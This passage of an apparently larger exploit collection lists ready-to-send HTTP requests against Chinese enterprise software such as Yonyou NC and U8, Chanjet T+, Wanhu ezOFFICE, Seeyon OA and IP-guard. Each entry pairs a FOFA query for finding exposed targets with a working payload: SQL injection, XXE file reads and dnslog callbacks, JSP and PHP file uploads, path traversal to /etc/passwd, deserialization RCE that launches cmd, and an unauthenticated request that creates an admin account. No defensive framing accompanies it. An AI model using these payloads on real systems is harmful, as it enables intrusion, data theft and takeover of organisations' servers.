Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
